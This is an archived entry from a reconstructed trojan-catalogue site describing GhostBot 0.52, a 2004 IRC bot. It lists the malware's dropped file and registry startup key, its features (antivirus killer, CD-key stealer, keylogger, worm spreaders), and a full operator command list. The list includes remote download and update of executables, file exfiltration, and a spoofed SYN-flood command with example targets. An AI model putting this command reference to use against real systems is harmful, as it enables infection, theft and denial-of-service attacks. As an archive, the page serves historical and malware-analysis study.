Archive A Reconstructed © MegaSecurity Database
GhostBot 0.52
Released 22 years, 1 month ago. March 2004
Copyright © MegaSecurity
By Positron
Informations
| Author | Positron |
| Family | GhostBot |
| Category | Remote Access |
| Version | GhostBot 0.52 |
| Released Date | Mar 2004, 22 years, 1 month ago. |
Additional Information
GhostBot:
dropped file:
c:\WINDOWS\84Gkbi7V.exe
size: 34.616 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "AVPTC32"
data: C:\WINDOWS\84Gkbi7V.exe
does (try to) connect to an IRC server
tested on Windows XP
13 November 2004
Author Information / Description
;-----------------------------------------------------------------------------------;
; BOT Name: Ghost-BOT 0.52 ;
; --------------------------------------------------------------------------------- ;
; Features: ;
; - SpyBot compatible commands, ;
; - AV/FW killer, ;
; - CD-Key Stealer, ;
; - Mydoom spreader, ;
; - NetBIOS spreader, ;
; - Encrypted strings in EXE, ;
; - Web-server (http://xxx.xxx.xxx.xxx:Port), ;
; - API search engine by CRC32 (used only for important APIs), ;
; - KeyLogger (Keylog file can be download from webserver too), ;
; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire, ;
; - Prepend all .exe files in shared dirs if they are smaller than 5MB, ;
; - Support DCC SEND, DCC GET, DCC CHAT and topic commands. ;
;
COMMANDS LIST: (Note: Only the "login" command is case sensitive)
--------------
login password (example: login hello)
delete [filename] (example: delete c:\windows\temp.exe)
execute [filename] (example: delete c:\windows\temp.exe)
rename [origenamfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname] (example: makedir c:\test\)
info (info: gives some info)
killprocess [processname] (example: killprocess mcafee.exe)
disconnect [sec.] (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit (info: bot quits running)
download [url] [filename] (example: download http://127.0.0.1/server.exe c:\driver.exe)
httpserver [Port] [root-dir] (example: httpserver 81 c:\)
listprocesses (info: lists all running proccesses)
op
get [filename] (example: get c:\command.com will trigger a dcc send on the remote pc)
raw [raw command] (example: raw PRIVMSG #ghostbot :hello)
list [path+filter] (example: list c:\*.*)
cdkeys (info: search CD-Keys on server's computer)
restart (info: restarts the server's computer)
shutdown (info: shuts down the server's computer)
ipscan [StartIP] [port] (example: ipscan 1.1.1.1 3137)
stopipscan (info: stop IP scanner)
uninstall (info: remove BOT)
startmydoom (info: restart MyDoom spreader)
stopmydoom (info: stop MyDoom spreader)
startavfwkiller {info: restart AV/FW killer}
stopavfwkiller {info: stop AV/FW killer}
starnetbios {info: (re)start netbios spreader}
stopnetbios {info: stop netbios spreader}
clone [srv.] [port] [chan] [number of clones] (example: clone 1.1.1.1 6667 #abc 4)
rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone)
killclones (info: remove all clones)
stopsyn (info: stop syn flooder)
update [URL] (example: update www.nasa.gov\1.exe)
Syn Flooder command
-------------------
syn [victim] [options]
Options:
-S: Spoof host (0 is random (default))
-p: Separated list of dest ports (0 is random (default))
-s: Separated list of src ports (0 is random (default))
-n: Number of packets (0 is continuous (default))
-d: Delay (in ms) (default 0)
Example I: syn www.kazaa.com -p 21,23,80,110
On this attack:
- Victim: www.kazaa.com
- Source IP: Random
- Destination ports: 21 + 23 + 80 + 110
- Source ports: Random
- Count: Continuous
- Delay: 0 ms (no delay between packets)
Example II: syn www.kazaa.org -S www.edonkey.com -p 21,80 -s 42,63 -n 1 -d 50
On this attack:
- Victim: www.kazaa.com
- Source IP/host: www.edonkey.com
- Destination ports: 21 + 80
- Source ports: 42 + 63
- Count: 1
* Please note that 1 count will send the syn packets from every *
* source port to every destination port. This means 4 packets *
* will be transmited with a 1 count on this attack. *
- Delay: 50 ms
PositronThis archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized me to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.